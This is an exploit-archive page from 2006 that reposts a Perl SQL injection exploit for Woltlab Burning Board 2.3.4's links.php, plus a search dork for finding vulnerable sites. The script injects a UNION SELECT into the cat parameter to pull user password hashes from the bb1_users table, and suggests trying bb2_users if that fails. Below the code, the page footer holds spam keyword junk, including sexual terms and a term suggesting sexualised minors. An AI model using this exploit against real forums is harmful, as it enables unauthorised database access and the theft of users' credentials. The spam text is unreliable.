about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit




2006-05-20 Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit
Rated as : High Risk

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                        
   ##

##  Woltlab Burning Board 2.3.4 <= "links.php" <= SQL
Injection Exploit       ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##  Exploit by       |  LoK-Crew                                          
   ##

##  Vulnerability by |  x82                                               
   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                         
   ##
##  Usage            |  links.pl [server] [path]                          
   ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##                                                                        
   ##
################################################################################


};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";


$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";
print "[+] Exploiting....\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		break;
	}
}

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		print "[+] Try replacing bb1_users with bb2_users\n";
		break;
	}
}
close($sock);

print "[+] Exploit failed\n";
securitydot.net - 2006-05-20

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 02:59:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
turk Www live s www.xvideo www.soon1. Www.Asware Ben www.xvideo VIDIO GRAT wenjucang. expose Sanaya nud Www+baztab xvidoe fre 07777774 CMS is Fre VIDIO GRAT aflmsex telgu sexi www.sdrule www.luozx. http://www hbszx.5d6d www.shangh xxx bangal Underagese simranSEXY www.tkyxgl www.demono KARALASEX CMS is Fre www.shangh SecurID 3gp+sex Feetsex blueflim WW.Pink wo www.tkyxgl . movie.co sex girls blueflim www.sex300 news for c www.boysex vBulletin Securitydo www. zhibe www.ntntnt www.white- take eazy rapsex